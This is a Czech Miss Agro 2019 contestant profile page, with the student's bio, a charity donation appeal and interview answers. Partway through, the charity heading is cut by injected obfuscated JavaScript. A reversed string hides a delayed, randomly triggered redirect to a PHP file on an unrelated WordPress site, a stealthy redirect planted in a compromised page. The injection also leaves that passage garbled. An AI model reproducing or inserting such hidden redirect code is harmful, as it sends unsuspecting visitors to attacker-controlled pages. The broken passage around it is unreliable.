Kristýna Laiová

Profil

Fakulta: PEF
Obor: Informatika (INFO)
Ročník: 2.
Věk:
23

Kristýna je entusiastická osobnost, kterou baví rozdávat úsměv. Svůj drive a energii nejraději věnuje kreativním činnostem – jednou z nich je její zaměstnání v herním studiu jako 3D Asset Designer, od mala miluje zpěv, ráda se vyřádí na tanečním parketu, a ve volném čase ji najdete u video her, s přáteli u pivka, nebo v kuchyni. Ráda vaří a jí – především asijská jídla.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2019?

Zbožňuji třpytivé věci, takže mít tu čest nosit korunku by mě převelice potěšilo! Ovšem, tuto čest má v zásluze každá z nás, protože se zastávám názoru, že nikdo není víc než ten druhý. Lidé jsou si rovni, každý má ten svůj plamínek, kterým okouzlí. Do Miss Agra jsem šla za zkušenostmi a abych poznala na sobě nepoznané a samozřejmě nové fajn lidi.

Máš nějaký životní vzor? Čím Tě inspiruje?

Patřím mezi ty lidi, kteří svůj životní vzor nemají. Spíše naslouchám své intuici a řídím se podle sebe.

Na který předmět na ČZU vzpomínáš nejvíce a proč?

Jsou dva nejhlavnější důvody, proč jsem šla na ČZU. První je vystoupení z komfortní zóny a opět vkročit do studijního světa. Významnějším důvodem je poznání nových fajn lidí. Tyto dva aspekty se navzájem ovlivňují – lidé tahají za jeden provaz, podporují se v obtížných situacích. Ano, mluvím zejména o zkouškovém. Nejvíce si vzpomínám na Matematickou logiku a grafy, protože jsem první pokusy padala na kolena a už si přestala věřit. Nyní mám v indexu „Velmi dobře“, protože mě z toho vytáhl můj spolužák.

Na co se v soutěži Miss Agro těšíš nejvíc?

Nejen, že se těším na zážitky a práci se super lidmi, ale ráda na sobě pracuji a jelikož se považuji za kolísavého ambiverta, chci obrousit hrany své občasné sociální uzavřenosti. Věřím totiž, že ve mně tkví velký entusiasmus, který mě velmi baví rozdávat kolem sebe. Introvertní bariéry na mé osobnosti mi v tom ovšem často brání a Miss Agro považuji za klíč ke dveřím, za kterými mě čeká svět, kde jsem lepším člověkem.